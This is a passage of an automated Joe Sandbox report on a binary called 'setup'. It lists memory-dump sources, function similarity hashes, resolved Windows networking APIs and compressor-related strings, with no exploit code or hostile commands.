                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharControlDeviceMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1419012440-0
                                                                                                    • Opcode ID: 10ece1784d49b5ecff7f6ecb206cf5a982aa25f4dd7f2c71edf080b0c21470c2
                                                                                                    • Instruction ID: 83d132fe723cb70e7e3e9108c3c6330b35b23179e251e7d63e62aabc84e90c32
                                                                                                    • Opcode Fuzzy Hash: 10ece1784d49b5ecff7f6ecb206cf5a982aa25f4dd7f2c71edf080b0c21470c2
                                                                                                    • Instruction Fuzzy Hash: 7CF0A0753803197BF7209B50DC8AFE6BAACEB01B90F1001317F18E91D2D6F0EA54C6A8
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 31276548-0
                                                                                                    • Opcode ID: 462557d5bd343cea67fb1a5fdae4586d32b1e4512c9248c48b3e4025070bd6e9
                                                                                                    • Instruction ID: ea439a715f54e3d35d73a4083548fcafabf4292f720ab37f847997d6b7ce1c84
                                                                                                    • Opcode Fuzzy Hash: 462557d5bd343cea67fb1a5fdae4586d32b1e4512c9248c48b3e4025070bd6e9
                                                                                                    • Instruction Fuzzy Hash: 5AC04CF59043448FC600FF68D549519BBF0BB40241F845929E88582305EA74D22D8A87
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3a95fb49109aa7c9bf3b77a630d204c11382a45983629bf76454d8ff980aecc4
                                                                                                    • Instruction ID: d952e5f47771ec51fd1587a32b42823415c3bef41187dedd65591e892f29ba4b
                                                                                                    • Opcode Fuzzy Hash: 3a95fb49109aa7c9bf3b77a630d204c11382a45983629bf76454d8ff980aecc4
                                                                                                    • Instruction Fuzzy Hash: 0E117970A156009ACB05BF34C59277DB6A0AF90700F45887CE88A5B347DF38DA448BA7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 080bdf12f93e2fdf756bd3777090ef662e7cc1410b387a1f42a9cd0e53f6676a
                                                                                                    • Instruction ID: 01cb1da7d4b8ebc56052c41993e389c1aecc6ed9935510d2a1ec1bdf3a4c0256
                                                                                                    • Opcode Fuzzy Hash: 080bdf12f93e2fdf756bd3777090ef662e7cc1410b387a1f42a9cd0e53f6676a
                                                                                                    • Instruction Fuzzy Hash: 33F01770A09610ABC7057F70C59273EB6A4AF51B04F42586DF88A5B343DF78CA858BDB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9ea9861681d967c1b97e0ce2d570806b306d915668d92abd4f5d1dd4e0219e6d
                                                                                                    • Instruction ID: 5ea086d2b506b955cdc0f3d6147188e7080c3157005dd76cee72a0b8d99bad76
                                                                                                    • Opcode Fuzzy Hash: 9ea9861681d967c1b97e0ce2d570806b306d915668d92abd4f5d1dd4e0219e6d
                                                                                                    • Instruction Fuzzy Hash: 9EF08CB09092109BC7057F70C59273DB6E4AF52704F42686DF88A6B343DF78CA848B9B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9129e070d46f460f44505443c40056203fc384cc58c4fd0c01bcd63b16bbc189
                                                                                                    • Instruction ID: 70592db7efa4fb8b7ef9e6aa77656bfe985434a2f237c3e79dbfddc196141bf6
                                                                                                    • Opcode Fuzzy Hash: 9129e070d46f460f44505443c40056203fc384cc58c4fd0c01bcd63b16bbc189
                                                                                                    • Instruction Fuzzy Hash: 2FE092B35642464BE322CF1EACC1B55A7EEB704312F64C43AE404C6630CB64D8A44718
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 66eb887e1f0a9a57756bd89a3faa37b5f2c985023b9039adfe96c5632e44c03d
                                                                                                    • Instruction ID: 7f0f5966335d64ef5d212a35bb9644ca59ee7d355c4e499c6994b0a7f31ad657
                                                                                                    • Opcode Fuzzy Hash: 66eb887e1f0a9a57756bd89a3faa37b5f2c985023b9039adfe96c5632e44c03d
                                                                                                    • Instruction Fuzzy Hash: 74E065709092009AD7067F70C59273DB6A0AF92704F9A486DE48A5B243DF38CA458BEB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 06849849084399e20ed55ee2db7cbcb2a85aabb176019eac087c0c2df2a756e7
                                                                                                    • Instruction ID: a87c5fe3b975b2b70e5c30b2b651c91474ab821691c5ece8f84a35189f0462ca
                                                                                                    • Opcode Fuzzy Hash: 06849849084399e20ed55ee2db7cbcb2a85aabb176019eac087c0c2df2a756e7
                                                                                                    • Instruction Fuzzy Hash: EBC08CB0C047408BC202BF38A10A23CFAB07F42300FC42CACE5801B30AE635C01C869B
                                                                                                    APIs
                                                                                                      • Part of subcall function 00215731: EnterCriticalSection.KERNEL32(00357D30,0023BDFF,?,00000000,00000000,?,?,0023C461,0023C74F,00000003,00000010,0023C74F,00000010,BASS/2.4,00000000), ref: 00215736
                                                                                                    • LoadLibraryA.KERNEL32(wininet,00000000,?,002114F9,000000F0,?,00231C27,00000000,00000000,?,?,?,?,?,?), ref: 002112D7
                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 002112F6
                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetSetOptionA), ref: 00211303
                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetQueryOptionA), ref: 00211310
                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 0021131D
                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetGetConnectedState), ref: 0021132A
                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 00211337
                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetReadFileExA), ref: 00211344
                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetSetFilePointer), ref: 00211351
                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetConnectA), ref: 0021136C
                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetCrackUrlA), ref: 00211387
                                                                                                    • GetProcAddress.KERNEL32(00000000,HttpOpenRequestA), ref: 002113A2
                                                                                                    • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 002113AF
                                                                                                    • GetProcAddress.KERNEL32(00000000,HttpQueryInfoA), ref: 002113BC
                                                                                                    • GetProcAddress.KERNEL32(00000000,FtpOpenFileA), ref: 002113D7
                                                                                                    • GetProcAddress.KERNEL32(00000000,FtpCommandA), ref: 002113E4
                                                                                                    • GetProcAddress.KERNEL32(00000000,FtpGetFileSize), ref: 002113F1
                                                                                                    • LoadLibraryA.KERNEL32(ws2_32,?,002114F9,000000F0,?,00231C27,00000000,00000000,?,?,?,?,?,?), ref: 002113FD
                                                                                                    • GetProcAddress.KERNEL32(00000000,shutdown), ref: 0021140E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad$CriticalEnterSection
                                                                                                    • String ID: FtpCommandA$FtpGetFileSize$FtpOpenFileA$FtpOpenFileW$HttpOpenRequestA$HttpOpenRequestW$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetConnectW$InternetCrackUrlA$InternetCrackUrlW$InternetGetConnectedState$InternetOpenA$InternetQueryOptionA$InternetReadFile$InternetReadFileExA$InternetSetFilePointer$InternetSetOptionA$shutdown$wininet$ws2_32
                                                                                                    • API String ID: 479578514-3113607249
                                                                                                    • Opcode ID: 9abc1d6376a21727d84640e9b60b16b616b30ad1e77e93b83e0d61820d430039
                                                                                                    • Instruction ID: ec3eb8445c14f83380d474b83f7b983c7c6408751b3ddefeeb4c48116010c60a
                                                                                                    • Opcode Fuzzy Hash: 9abc1d6376a21727d84640e9b60b16b616b30ad1e77e93b83e0d61820d430039
                                                                                                    • Instruction Fuzzy Hash: CB313D74E55318AA8723BF7A6C4985BBEFCEF65B52B0004ABE404D3271DEB89451CF60
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: freemalloc$_writeexitlongjmp
                                                                                                    • String ID: %s$ <stdin>$ <stdout>$ [6$$$arcdatafile$$.pmm$$$arcdatafile$$.tmp$4[6 [6$ERROR: can't alloc %lu memory bytes$^$pmm$ppmonstr d %s$ppmonstr e -o%d -m%d -r%d %s$read$write
                                                                                                    • API String ID: 3559836011-2115152460
                                                                                                    • Opcode ID: d3df98a4ec7ff921d98204493871af92e1d1cfba2bfff53a960de18fe4954fc2
                                                                                                    • Instruction ID: 0dc458462ad78d8f54b5e6e08a648d25a8e5936707f057928d0f7d4acab7e850
